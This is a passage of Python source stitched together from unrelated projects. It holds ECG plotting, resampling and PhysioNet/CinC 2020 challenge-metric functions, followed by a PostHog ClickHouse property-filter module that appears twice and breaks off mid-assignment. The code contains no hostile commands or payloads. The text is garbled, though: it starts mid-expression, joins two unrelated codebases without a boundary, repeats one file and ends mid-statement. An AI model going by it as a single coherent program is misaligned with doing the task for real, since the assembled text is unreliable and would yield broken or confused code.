f"https://physionet.org/lightwave/?db={physionet_lightwave_suffix[tranche]}" print(f"better view: {url}") if "plt" not in dir(): import matplotlib.pyplot as plt plt.MultipleLocator.MAXTICKS = 3000 if leads is None or leads == "all": _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # assert all([l in self.all_leads for l in _leads]) assert set(_leads).issubset(self._all_leads_set) # lead_list = self.load_ann(rec)["df_leads"]["lead_name"].tolist() # lead_indices = [lead_list.index(l) for l in _leads] lead_indices = [self.all_leads.index(l) for l in _leads] if data is None: _data = self.load_data(rec, data_format="channel_first", units="μV")[lead_indices] else: units = self._auto_infer_units(data) print(f"input data is auto detected to have units in {units}") if units.lower() == "mv": _data = 1000 * data else: _data = data assert _data.shape[0] == len(_leads), \ f"number of leads from data of shape ({_data.shape[0]}) does not match the length ({len(_leads)}) of `leads`" if same_range: y_ranges = np.ones((_data.shape[0],)) * np.max(np.abs(_data)) + 100 else: y_ranges = np.max(np.abs(_data), axis=1) + 100 if waves: if waves.get("p_onsets", None) and waves.get("p_offsets", None): p_waves = [ [onset, offset] \ for onset, offset in zip(waves["p_onsets"], waves["p_offsets"]) ] elif waves.get("p_peaks", None): p_waves = [ [ max(0, p + ms2samples(PlotCfg.p_onset, fs=self.get_fs(rec))), min(_data.shape[1], p + ms2samples(PlotCfg.p_offset, fs=self.get_fs(rec))) ] for p in waves["p_peaks"] ] else: p_waves = [] if waves.get("q_onsets", None) and waves.get("s_offsets", None): qrs = [ [onset, offset] for onset, offset in zip(waves["q_onsets"], waves["s_offsets"]) ] elif waves.get("q_peaks", None) and waves.get("s_peaks", None): qrs = [ [ max(0, q + ms2samples(PlotCfg.q_onset, fs=self.get_fs(rec))), min(_data.shape[1], s + ms2samples(PlotCfg.s_offset, fs=self.get_fs(rec))) ] for q,s in zip(waves["q_peaks"], waves["s_peaks"]) ] elif waves.get("r_peaks", None): qrs = [ [ max(0, r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))), min(_data.shape[1], r + ms2samples(PlotCfg.qrs_radius, fs=self.get_fs(rec))) ] for r in waves["r_peaks"] ] else: qrs = [] if waves.get("t_onsets", None) and waves.get("t_offsets", None): t_waves = [ [onset, offset] for onset, offset in zip(waves["t_onsets"], waves["t_offsets"]) ] elif waves.get("t_peaks", None): t_waves = [ [ max(0, t + ms2samples(PlotCfg.t_onset, fs=self.get_fs(rec))), min(_data.shape[1], t + ms2samples(PlotCfg.t_offset, fs=self.get_fs(rec))) ] for t in waves["t_peaks"] ] else: t_waves = [] else: p_waves, qrs, t_waves = [], [], [] palette = {"p_waves": "green", "qrs": "red", "t_waves": "pink",} plot_alpha = 0.4 if ann is None or data is None: diag_scored = self.get_labels(rec, scored_only=True, fmt="a") diag_all = self.get_labels(rec, scored_only=False, fmt="a") else: diag_scored = ann["scored"] diag_all = ann["all"] nb_leads = len(_leads) seg_len = self.fs[tranche] * 25 # 25 seconds nb_segs = _data.shape[1] // seg_len t = np.arange(_data.shape[1]) / self.fs[tranche] duration = len(t) / self.fs[tranche] fig_sz_w = int(round(DEFAULT_FIG_SIZE_PER_SEC * duration)) fig_sz_h = 6 * np.maximum(y_ranges, 750) / 1500 fig, axes = plt.subplots(nb_leads, 1, sharex=False, figsize=(fig_sz_w, np.sum(fig_sz_h))) if nb_leads == 1: axes = [axes] for idx in range(nb_leads): axes[idx].plot(t, _data[idx], color="black", linewidth="2.0", label=f"lead - {_leads[idx]}") axes[idx].axhline(y=0, linestyle="-", linewidth="1.0", color="red") # NOTE that `Locator` has default `MAXTICKS` equal to 1000 if ticks_granularity >= 1: axes[idx].xaxis.set_major_locator(plt.MultipleLocator(0.2)) axes[idx].yaxis.set_major_locator(plt.MultipleLocator(500)) axes[idx].grid(which="major", linestyle="-", linewidth="0.4", color="red") if ticks_granularity >= 2: axes[idx].xaxis.set_minor_locator(plt.MultipleLocator(0.04)) axes[idx].yaxis.set_minor_locator(plt.MultipleLocator(100)) axes[idx].grid(which="minor", linestyle=":", linewidth="0.2", color="gray") # add extra info. to legend # https://stackoverflow.com/questions/16826711/is-it-possible-to-add-a-string-as-a-legend-item-in-matplotlib axes[idx].plot([], [], " ", label=f"labels_s - {','.join(diag_scored)}") axes[idx].plot([], [], " ", label=f"labels_a - {','.join(diag_all)}") axes[idx].plot([], [], " ", label=f"tranche - {self.tranche_names[tranche]}") axes[idx].plot([], [], " ", label=f"fs - {self.fs[tranche]}") for w in ["p_waves", "qrs", "t_waves"]: for itv in eval(w): axes[idx].axvspan(itv[0], itv[1], color=palette[w], alpha=plot_alpha) axes[idx].legend(loc="upper left", fontsize=14) axes[idx].set_xlim(t[0], t[-1]) axes[idx].set_ylim(min(-600, -y_ranges[idx]), max(600, y_ranges[idx])) axes[idx].set_xlabel("Time [s]", fontsize=16) axes[idx].set_ylabel("Voltage [μV]", fontsize=16) plt.subplots_adjust(hspace=0.05) fig.tight_layout() if kwargs.get("save_path", None): plt.savefig(kwargs["save_path"], dpi=200, bbox_inches="tight") else: plt.show() def get_tranche_class_distribution(self, tranches:Sequence[str], scored_only:bool=True) -> Dict[str, int]: """ finished, checked, Parameters ---------- tranches: sequence of str, tranche symbols (A-F) scored_only: bool, default True, only get class distributions that are scored in the CINC2020 official phase Returns ------- distribution: dict, keys are abbrevations of the classes, values are appearance of corr. classes in the tranche. """ tranche_names = [self.tranche_names[t] for t in tranches] df = dx_mapping_scored if scored_only else dx_mapping_all distribution = CFG() for _, row in df.iterrows(): num = (row[[tranche_names]].values).sum() if num > 0: distribution[row["Abbreviation"]] = num return distribution @staticmethod def get_arrhythmia_knowledge(arrhythmias:Union[str,List[str]], **kwargs) -> NoReturn: """ finished, checked, knowledge about ECG features of specific arrhythmias, Parameters ---------- arrhythmias: str, or list of str, the arrhythmia(s) to check, in abbreviations or in SNOMED CT Code """ if isinstance(arrhythmias, str): d = [normalize_class(arrhythmias)] else: d = [normalize_class(c) for c in arrhythmias] # pp = pprint.PrettyPrinter(indent=4) # unsupported = [item for item in d if item not in dx_mapping_all["Abbreviation"]] unsupported = [item for item in d if item not in dx_mapping_scored["Abbreviation"].values] assert len(unsupported) == 0, \ f"`{unsupported}` {'is' if len(unsupported)==1 else 'are'} not supported!" for idx, item in enumerate(d): # pp.pprint(eval(f"EAK.{item}")) print(dict_to_str(eval(f"EAK.{item}"))) if idx < len(d)-1: print("*"*110) def load_resampled_data(self, rec:str, data_format:str="channel_first", siglen:Optional[int]=None) -> np.ndarray: """ finished, checked, resample the data of `rec` to 500Hz, or load the resampled data in 500Hz, if the corr. data file already exists Parameters ---------- rec: str, name of the record data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") siglen: int, optional, signal length, units in number of samples, if set, signal with length longer will be sliced to the length of `siglen` used for example when preparing/doing model training Returns ------- data: ndarray, the resampled (and perhaps sliced) signal data """ tranche = self._get_tranche(rec) if siglen is None: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz.npy") else: rec_fp = os.path.join(self.db_dirs[tranche], f"{rec}_500Hz_siglen_{siglen}.npy") if not os.path.isfile(rec_fp): # print(f"corresponding file {os.basename(rec_fp)} does not exist") data = self.load_data(rec, data_format="channel_first", units="mV", fs=None) if self.fs[tranche] != 500: data = resample_poly(data, 500, self.fs[tranche], axis=1) if siglen is not None and data.shape[1] >= siglen: # slice_start = (data.shape[1] - siglen)//2 # slice_end = slice_start + siglen # data = data[..., slice_start:slice_end] data = ensure_siglen(data, siglen=siglen, fmt="channel_first") np.save(rec_fp, data) elif siglen is None: np.save(rec_fp, data) else: # print(f"loading from local file...") data = np.load(rec_fp) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_raw_data(self, rec:str, backend:str="scipy") -> np.ndarray: """ finished, checked, load raw data from corresponding files with no further processing, in order to facilitate feeding data into the `run_12ECG_classifier` function Parameters ---------- rec: str, name of the record backend: str, default "scipy", the backend data reader, can also be "wfdb", note that "scipy" provides data in the format of "lead_first", while "wfdb" provides data in the format of "lead_last", Returns ------- raw_data: ndarray, raw data (d_signal) loaded from corresponding data file, without subtracting baseline nor dividing adc gain """ tranche = self._get_tranche(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) wfdb_rec = wfdb.rdrecord(rec_fp, physical=False) raw_data = np.asarray(wfdb_rec.d_signal) elif backend.lower() == "scipy": rec_fp = self.get_data_filepath(rec, with_ext=True) raw_data = loadmat(rec_fp)["val"] return raw_data def _check_nan(self, tranches:Union[str, Sequence[str]]) -> NoReturn: """ finished, checked, check if records from `tranches` has nan values accessing data using `p_signal` of `wfdb` would produce nan values, if exceptionally large values are encountered, this could help detect abnormal records as well Parameters ---------- tranches: str or sequence of str, tranches to check """ for t in tranches: for rec in self.all_records[t]: data = self.load_data(rec) if np.isnan(data).any(): print(f"record {rec} from tranche {t} has nan values") from ..aux_data.cinc2020_aux_data import load_weights def compute_all_metrics(classes:List[str], truth:Sequence, binary_pred:Sequence, scalar_pred:Sequence) -> Tuple[float]: """ finished, checked, Parameters ---------- classes: list of str, list of all the classes, in the format of abbrevations truth: sequence, ground truth array, of shape (n_records, n_classes), with values 0 or 1 binary_pred: sequence, binary predictions, of shape (n_records, n_classes), with values 0 or 1 scalar_pred: sequence, probability predictions, of shape (n_records, n_classes), with values within [0,1] Returns ------- auroc: float, auprc: float, accuracy: float, f_measure: float, f_beta_measure: float, g_beta_measure: float, challenge_metric: float, """ # normal_class = "426783006" normal_class = "NSR" # equivalent_classes = [["713427006", "59118001"], ["284470004", "63593006"], ["427172004", "17338001"]] weights = load_weights(classes=classes) _truth = np.array(truth) _binary_pred = np.array(binary_pred) _scalar_pred = np.array(scalar_pred) print("- AUROC and AUPRC...") auroc, auprc = compute_auc(_truth, _scalar_pred) print("- Accuracy...") accuracy = compute_accuracy(_truth, _binary_pred) print("- F-measure...") f_measure = compute_f_measure(_truth, _binary_pred) print("- F-beta and G-beta measures...") f_beta_measure, g_beta_measure = compute_beta_measures(_truth, _binary_pred, beta=2) print("- Challenge metric...") challenge_metric = compute_challenge_metric(weights, _truth, _binary_pred, classes, normal_class) print("Done.") # Return the results. return auroc, auprc, accuracy, f_measure, f_beta_measure, g_beta_measure, challenge_metric # Compute recording-wise accuracy. def compute_accuracy(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) num_correct_recordings = 0 for i in range(num_recordings): if np.all(labels[i, :]==outputs[i, :]): num_correct_recordings += 1 return float(num_correct_recordings) / float(num_recordings) # Compute confusion matrices. def compute_confusion_matrices(labels:np.ndarray, outputs:np.ndarray, normalize:bool=False) -> np.ndarray: """ checked, """ # Compute a binary confusion matrix for each class k: # # [TN_k FN_k] # [FP_k TP_k] # # If the normalize variable is set to true, then normalize the contributions # to the confusion matrix by the number of labels per recording. num_recordings, num_classes = np.shape(labels) if not normalize: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1 elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1 elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1 else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") else: A = np.zeros((num_classes, 2, 2)) for i in range(num_recordings): normalization = float(max(np.sum(labels[i, :]), 1)) for j in range(num_classes): if labels[i, j]==1 and outputs[i, j]==1: # TP A[j, 1, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==1: # FP A[j, 1, 0] += 1.0/normalization elif labels[i, j]==1 and outputs[i, j]==0: # FN A[j, 0, 1] += 1.0/normalization elif labels[i, j]==0 and outputs[i, j]==0: # TN A[j, 0, 0] += 1.0/normalization else: # This condition should not happen. raise ValueError("Error in computing the confusion matrix.") return A # Compute macro F-measure. def compute_f_measure(labels:np.ndarray, outputs:np.ndarray) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs) f_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if 2 * tp + fp + fn: f_measure[k] = float(2 * tp) / float(2 * tp + fp + fn) else: f_measure[k] = float("nan") macro_f_measure = np.nanmean(f_measure) return macro_f_measure # Compute F-beta and G-beta measures from the unofficial phase of the Challenge. def compute_beta_measures(labels:np.ndarray, outputs:np.ndarray, beta:Real) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) A = compute_confusion_matrices(labels, outputs, normalize=True) f_beta_measure = np.zeros(num_classes) g_beta_measure = np.zeros(num_classes) for k in range(num_classes): tp, fp, fn, tn = A[k, 1, 1], A[k, 1, 0], A[k, 0, 1], A[k, 0, 0] if (1+beta**2)*tp + fp + beta**2*fn: f_beta_measure[k] = float((1+beta**2)*tp) / float((1+beta**2)*tp + fp + beta**2*fn) else: f_beta_measure[k] = float("nan") if tp + fp + beta*fn: g_beta_measure[k] = float(tp) / float(tp + fp + beta*fn) else: g_beta_measure[k] = float("nan") macro_f_beta_measure = np.nanmean(f_beta_measure) macro_g_beta_measure = np.nanmean(g_beta_measure) return macro_f_beta_measure, macro_g_beta_measure # Compute macro AUROC and macro AUPRC. def compute_auc(labels:np.ndarray, outputs:np.ndarray) -> Tuple[float, float]: """ checked, """ num_recordings, num_classes = np.shape(labels) # Compute and summarize the confusion matrices for each class across at distinct output values. auroc = np.zeros(num_classes) auprc = np.zeros(num_classes) for k in range(num_classes): # We only need to compute TPs, FPs, FNs, and TNs at distinct output values. thresholds = np.unique(outputs[:, k]) thresholds = np.append(thresholds, thresholds[-1]+1) thresholds = thresholds[::-1] num_thresholds = len(thresholds) # Initialize the TPs, FPs, FNs, and TNs. tp = np.zeros(num_thresholds) fp = np.zeros(num_thresholds) fn = np.zeros(num_thresholds) tn = np.zeros(num_thresholds) fn[0] = np.sum(labels[:, k]==1) tn[0] = np.sum(labels[:, k]==0) # Find the indices that result in sorted output values. idx = np.argsort(outputs[:, k])[::-1] # Compute the TPs, FPs, FNs, and TNs for class k across thresholds. i = 0 for j in range(1, num_thresholds): # Initialize TPs, FPs, FNs, and TNs using values at previous threshold. tp[j] = tp[j-1] fp[j] = fp[j-1] fn[j] = fn[j-1] tn[j] = tn[j-1] # Update the TPs, FPs, FNs, and TNs at i-th output value. while i < num_recordings and outputs[idx[i], k] >= thresholds[j]: if labels[idx[i], k]: tp[j] += 1 fn[j] -= 1 else: fp[j] += 1 tn[j] -= 1 i += 1 # Summarize the TPs, FPs, FNs, and TNs for class k. tpr = np.zeros(num_thresholds) tnr = np.zeros(num_thresholds) ppv = np.zeros(num_thresholds) for j in range(num_thresholds): if tp[j] + fn[j]: tpr[j] = float(tp[j]) / float(tp[j] + fn[j]) else: tpr[j] = float("nan") if fp[j] + tn[j]: tnr[j] = float(tn[j]) / float(fp[j] + tn[j]) else: tnr[j] = float("nan") if tp[j] + fp[j]: ppv[j] = float(tp[j]) / float(tp[j] + fp[j]) else: ppv[j] = float("nan") # Compute AUROC as the area under a piecewise linear function with TPR/ # sensitivity (x-axis) and TNR/specificity (y-axis) and AUPRC as the area # under a piecewise constant with TPR/recall (x-axis) and PPV/precision # (y-axis) for class k. for j in range(num_thresholds-1): auroc[k] += 0.5 * (tpr[j+1] - tpr[j]) * (tnr[j+1] + tnr[j]) auprc[k] += (tpr[j+1] - tpr[j]) * ppv[j+1] # Compute macro AUROC and macro AUPRC across classes. macro_auroc = np.nanmean(auroc) macro_auprc = np.nanmean(auprc) return macro_auroc, macro_auprc # Compute modified confusion matrix for multi-class, multi-label tasks. def compute_modified_confusion_matrix(labels:np.ndarray, outputs:np.ndarray) -> np.ndarray: """ checked, Compute a binary multi-class, multi-label confusion matrix, where the rows are the labels and the columns are the outputs. """ num_recordings, num_classes = np.shape(labels) A = np.zeros((num_classes, num_classes)) # Iterate over all of the recordings. for i in range(num_recordings): # Calculate the number of positive labels and/or outputs. normalization = float(max(np.sum(np.any((labels[i, :], outputs[i, :]), axis=0)), 1)) # Iterate over all of the classes. for j in range(num_classes): # Assign full and/or partial credit for each positive class. if labels[i, j]: for k in range(num_classes): if outputs[i, k]: A[j, k] += 1.0/normalization return A # Compute the evaluation metric for the Challenge. def compute_challenge_metric(weights:np.ndarray, labels:np.ndarray, outputs:np.ndarray, classes:List[str], normal_class:str) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) normal_index = classes.index(normal_class) # Compute the observed score. A = compute_modified_confusion_matrix(labels, outputs) observed_score = np.nansum(weights * A) # Compute the score for the model that always chooses the correct label(s). correct_outputs = labels A = compute_modified_confusion_matrix(labels, correct_outputs) correct_score = np.nansum(weights * A) # Compute the score for the model that always chooses the normal class. inactive_outputs = np.zeros((num_recordings, num_classes), dtype=np.bool) inactive_outputs[:, normal_index] = 1 A = compute_modified_confusion_matrix(labels, inactive_outputs) inactive_score = np.nansum(weights * A) if correct_score != inactive_score: normalized_score = float(observed_score - inactive_score) / float(correct_score - inactive_score) else: normalized_score = 0.0 return normalized_score # alias compute_metrics = compute_challenge_metric
import re from typing import Any, Dict, List, Optional, Set, Tuple, cast from django.utils import timezone from rest_framework import exceptions from ee.clickhouse.client import sync_execute from ee.clickhouse.materialized_columns.columns import TableWithProperties, get_materialized_columns from ee.clickhouse.models.cohort import format_filter_query from ee.clickhouse.models.util import is_json from ee.clickhouse.sql.events import SELECT_PROP_VALUES_SQL, SELECT_PROP_VALUES_SQL_WITH_FILTER from ee.clickhouse.sql.person import GET_DISTINCT_IDS_BY_PROPERTY_SQL from posthog.models.cohort import Cohort from posthog.models.event import Selector from posthog.models.property import NEGATED_OPERATORS, OperatorType, Property, PropertyName, PropertyType from posthog.models.team import Team from posthog.utils import is_valid_regex, relative_date_parse def parse_prop_clauses( filters: List[Property], team_id: Optional[int], prepend: str = "global", table_name: str = "", allow_denormalized_props: bool = False, filter_test_accounts=False, is_person_query=False, ) -> Tuple[str, Dict]: final = [] params: Dict[str, Any] = {} if team_id is not None: params["team_id"] = team_id if table_name != "": table_name += "." if filter_test_accounts: test_account_filters = Team.objects.only("test_account_filters").get(id=team_id).test_account_filters filters.extend([Property(**prop) for prop in test_account_filters]) for idx, prop in enumerate(filters): if prop.type == "cohort": try: cohort = Cohort.objects.get(pk=prop.value, team_id=team_id) except Cohort.DoesNotExist: final.append("AND 0 = 13") # If cohort doesn't exist, nothing can match else: person_id_query, cohort_filter_params = format_filter_query(cohort, idx) params = {**params, **cohort_filter_params} final.append( "AND {table_name}distinct_id IN ({clause})".format(table_name=table_name, clause=person_id_query) ) elif prop.type == "person": filter_query, filter_params = prop_filter_json_extract( prop, idx, "{}person".format(prepend), allow_denormalized_props=allow_denormalized_props ) if is_person_query: final.append(filter_query) params.update(filter_params) else: final.append( "AND {table_name}distinct_id IN ({filter_query})".format( filter_query=GET_DISTINCT_IDS_BY_PROPERTY_SQL.format(filters=filter_query), table_name=table_name, ) ) params.update(filter_params) elif prop.type == "element": query, filter_params = filter_element( {prop.key: prop.value}, operator=prop.operator, prepend="{}_".format(idx) ) if query: final.append(f" AND {query}") params.update(filter_params) else: filter_query, filter_params = prop_filter_json_extract( prop, idx, prepend, prop_var="{}properties".format(table_name), allow_denormalized_props=allow_denormalized_props, ) final.append(f"{filter_query} AND {table_name}team_id = %(team_id)s" if team_id else filter_query) params.update(filter_params) return " ".join(final), params def prop_filter_json_extract( prop: Property, idx: int, prepend: str = "", prop_var: str = "properties", allow_denormalized_props: bool = False ) -> Tuple[str, Dict[str, Any]]: # TODO: Once all queries are migrated over we can get rid of allow_denormalized_props property_expr, is_denormalized = get_property_string_expr( property_table(prop), prop.key, f"%(k{prepend}_{idx})s", prop_var, allow_denormalized_props ) operator = prop.operator params: Dict[str, Any] = {} if operator == "is_not": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value)} return ( "AND NOT has(%(v{prepend}_{idx})s, {left})".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator == "icontains": value = "%{}%".format(prop.value) params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): value} return ( "AND {left} ILIKE %(v{prepend}_{idx})s".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator == "not_icontains": value = "%{}%".format(prop.value) params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): value} return ( "AND NOT ({left} ILIKE %(v{prepend}_{idx})s)".format(idx=idx, prepend=prepend, left=property_expr), params, ) elif operator in ("regex", "not_regex"): if not is_valid_regex(prop.value): return "AND 1 = 2", {} params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND {regex_function}({left}, %(v{prepend}_{idx})s)".format( regex_function="match" if operator == "regex" else "NOT match", idx=idx, prepend=prepend, left=property_expr, ), params, ) elif operator == "is_set": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} if is_denormalized: return ( "AND NOT isNull({left})".format(left=property_expr), params, ) return ( "AND JSONHas({prop_var}, %(k{prepend}_{idx})s)".format(idx=idx, prepend=prepend, prop_var=prop_var), params, ) elif operator == "is_not_set": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} if is_denormalized: return ( "AND isNull({left})".format(left=property_expr), params, ) return ( "AND (isNull({left}) OR NOT JSONHas({prop_var}, %(k{prepend}_{idx})s))".format( idx=idx, prepend=prepend, prop_var=prop_var, left=property_expr ), params, ) elif operator == "gt": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND toFloat64OrNull(trim(BOTH '\"' FROM replaceRegexpAll({left}, ' ', ''))) > %(v{prepend}_{idx})s".format( idx=idx, prepend=prepend, left=property_expr, ), params, ) elif operator == "lt": params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): prop.value} return ( "AND toFloat64OrNull(trim(BOTH '\"' FROM replaceRegexpAll({left}, ' ', ''))) < %(v{prepend}_{idx})s".format( idx=idx, prepend=prepend, left=property_expr, ), params, ) else: if is_json(prop.value) and not is_denormalized: clause = "AND has(%(v{prepend}_{idx})s, replaceRegexpAll(visitParamExtractRaw({prop_var}, %(k{prepend}_{idx})s),' ', ''))" params = { "k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value, remove_spaces=True), } else: clause = "AND has(%(v{prepend}_{idx})s, {left})" params = {"k{}_{}".format(prepend, idx): prop.key, "v{}_{}".format(prepend, idx): box_value(prop.value)} return ( clause.format(left=property_expr, idx=idx, prepend=prepend, prop_var=prop_var), params, ) def property_table(property: Property) -> TableWithProperties: if property.type == "event": return "events" elif property.type == "person": return "person" else: raise ValueError(f"Property type does not have a table: {property.type}") def get_property_string_expr( table: TableWithProperties, property_name: PropertyName, var: str, prop_var: str, allow_denormalized_props: bool = True, ) -> Tuple[str, bool]: materialized_columns = get_materialized_columns(table) if allow_denormalized_props else {} # :TODO: Handle denormalized properties in person table if allow_denormalized_props and property_name in materialized_columns and table == "events": return materialized_columns[property_name], True return f"trim(BOTH '\"' FROM JSONExtractRaw({prop_var}, {var}))", False def box_value(value: Any, remove_spaces=False) -> List[Any]: if not isinstance(value, List): value = [value] return [str(value).replace(" ", "") if remove_spaces else str(value) for value in value] def get_property_values_for_key(key: str, team: Team, value: Optional[str] = None): parsed_date_from = "AND timestamp >= '{}'".format(relative_date_parse("-7d").strftime("%Y-%m-%d 00:00:00")) parsed_date_to = "AND timestamp <= '{}'".format(timezone.now().strftime("%Y-%m-%d 23:59:59")) if value: return sync_execute( SELECT_PROP_VALUES_SQL_WITH_FILTER.format(parsed_date_from=parsed_date_from, parsed_date_to=parsed_date_to), {"team_id": team.pk, "key": key, "value": "%{}%".format(value)}, ) return sync_execute( SELECT_PROP_VALUES_SQL.format(parsed_date_from=parsed_date_from, parsed_date_to=parsed_date_to), {"team_id": team.pk, "key": key}, ) def filter_element(filters: Dict, *, operator: Optional[OperatorType] = None, prepend: str = "") -> Tuple[str, Dict]: if not operator: operator = "exact" params = {} final_conditions = [] if filters.get("selector") is not None: if operator not in ("exact", "is_not"): raise exceptions.ValidationError( 'Filtering by element selector only supports operators "equals" and "doesn\'t equal" currently.' ) selectors = filters["selector"] if isinstance(filters["selector"], list) else [filters["selector"]] if selectors: combination_conditions = [] for idx, query in enumerate(selectors): selector = Selector(query, escape_slashes=False) key = f"{prepend}_{idx}_selector_regex" params[key] = build_selector_regex(selector) combination_conditions.append(f"match(elements_chain, %({key})s)") final_conditions.append(f"({" OR ".join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty selector list provided, it can't match anything return "0 = 191", {} if filters.get("tag_name") is not None: if operator not in ("exact", "is_not"): raise exceptions.ValidationError( 'Filtering by element tag only supports operators "equals" and "doesn\'t equal" currently.' ) tag_names = filters["tag_name"] if isinstance(filters["tag_name"], list) else [filters["tag_name"]] if tag_names: combination_conditions = [] for idx, tag_name in enumerate(tag_names): key = f"{prepend}_{idx}_tag_name_regex" params[key] = rf"(^|;){tag_name}(\.|$|;|:)" combination_conditions.append(f"match(elements_chain, %({key})s)") final_conditions.append(f"({" OR ".join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty tag_name list provided, it can't match anything return "0 = 192", {} attributes: Dict[str, List] = {} for key in ["href", "text"]: if filters.get(key) is not None: attributes[key] = process_ok_values(filters[key], operator) if attributes: for key, ok_values in attributes.items(): if ok_values: combination_conditions = [] for idx, value in enumerate(ok_values): optional_flag = "(?i)" if operator.endswith("icontains") else "" params[f"{prepend}_{key}_{idx}_attributes_regex"] = f'{optional_flag}({key}="{value}")' combination_conditions.append(f"match(elements_chain, %({prepend}_{key}_{idx}_attributes_regex)s)") final_conditions.append(f"({" OR ".join(combination_conditions)})") elif operator not in NEGATED_OPERATORS: # If a non-negated filter has an empty href or text list provided, it can't match anything return "0 = 193", {} if final_conditions: return f"{"NOT " if operator in NEGATED_OPERATORS else ""}({" AND ".join(final_conditions)})", params else: return "", {} def process_ok_values(ok_values: Any, operator: OperatorType) -> List[str]: if operator.endswith("_set"): return [r'[^"]+'] else: # Make sure ok_values is a list ok_values = cast(List[str], [str(val) for val in ok_values]) if isinstance(ok_values, list) else [ok_values] # Escape double quote characters, since e.g. text 'foo="bar"' is represented as text="foo=\"bar\"" # in the elements chain ok_values = [text.replace('"', r"\"") for text in ok_values] if operator.endswith("icontains"): # Process values for case-insensitive-contains matching by way of regex, # making sure matching scope is limited to between double quotes return [rf'[^"]*{re.escape(text)}[^"]*' for text in ok_values] if operator.endswith("regex"): # Use values as-is in case of regex matching return ok_values # For all other operators escape regex-meaningful sequences return [re.escape(text) for text in ok_values] def build_selector_regex(selector: Selector) -> str: regex = r"" for tag in selector.parts: if tag.data.get("tag_name") and isinstance(tag.data["tag_name"], str): if tag.data["tag_name"] == "*": regex += ".+" else: regex += tag.data["tag_name"] if tag.data.get("attr_class__contains"): regex += r".*?\.{}".format(r"\..*?".join(sorted(tag.data["attr_class__contains"]))) if tag.ch_attributes: regex += ".*?" for key, value in sorted(tag.ch_attributes.items()): regex += '{}="{}".*?'.format(key, value) regex += r"([-_a-zA-Z0-9\.]*?)?($|;|:([^;^\s]*(;|$|\s)))" if tag.direct_descendant: regex += ".*" return regex def extract_tables_and_properties(props: List[Property]) -> Set[Tuple[PropertyName, PropertyType]]: return set((prop.key, prop.type) for prop in props)
import re from typing import Any, Dict, List, Optional, Set, Tuple, cast from django.utils import timezone from rest_framework import exceptions from ee.clickhouse.client import sync_execute from ee.clickhouse.materialized_columns.columns import TableWithProperties, get_materialized_columns from ee.clickhouse.models.cohort import format_filter_query from ee.clickhouse.models.util import is_json from ee.clickhouse.sql.events import SELECT_PROP_VALUES_SQL, SELECT_PROP_VALUES_SQL_WITH_FILTER from ee.clickhouse.sql.person import GET_DISTINCT_IDS_BY_PROPERTY_SQL from posthog.models.cohort import Cohort from posthog.models.event import Selector from posthog.models.property import NEGATED_OPERATORS, OperatorType, Property, PropertyName, PropertyType from posthog.models.team import Team from posthog.utils import is_valid_regex, relative_date_parse def parse_prop_clauses( filters: List[Property], team_id: Optional[int], prepend: str = "global", table_name: str = "", allow_denormalized_props: bool = False, filter_test_accounts=False, is_person_query=False, ) -> Tuple[str, Dict]: final = [] params: Dict[str, Any] = {} if team_id is not None: params["team_id"] = team_id if table_name != "": table_name += "." if filter_test_accounts: test_account_filters = Team.objects.only("test_account_filters").get(id=team_id).test_account_filters filters.extend([Property(**prop) for prop in test_account_filters]) for idx, prop in enumerate(filters): if prop.type == "cohort": try: cohort = Cohort.objects.get(pk=prop.value, team_id=team_id) except Cohort.DoesNotExist: final.append("AND 0 = 13") # If cohort doesn't exist, nothing can match else: person_id_query, cohort_filter_params = format_filter_query(cohort, idx) params = {**params, **cohort_filter_params} final.append( "AND {table_name}distinct_id IN ({clause})".format(table_name=table_name, clause=person_id_query) ) elif prop.type == "person": filter_query, filter_params = prop_filter_json_extract( prop, idx, "{}person".format(prepend), allow_denormalized_props=allow_denormalized_props ) if is_person_query: final.append(filter_query) params.update(filter_params) else: final.append( "AND {table_name}distinct_id IN ({filter_query})".format( filter_query=GET_DISTINCT_IDS_BY_PROPERTY_SQL.format(filters=filter_query), table_name=table_name, ) ) params.update(filter_params) elif prop.type == "element": query, filter_params = filter_element( {prop.key: prop.value}, operator=prop.operator, prepend="{}_".format(idx) ) if query: final.append(f" AND {query}") params.update(filter_params) else: filter_query, filter_params = 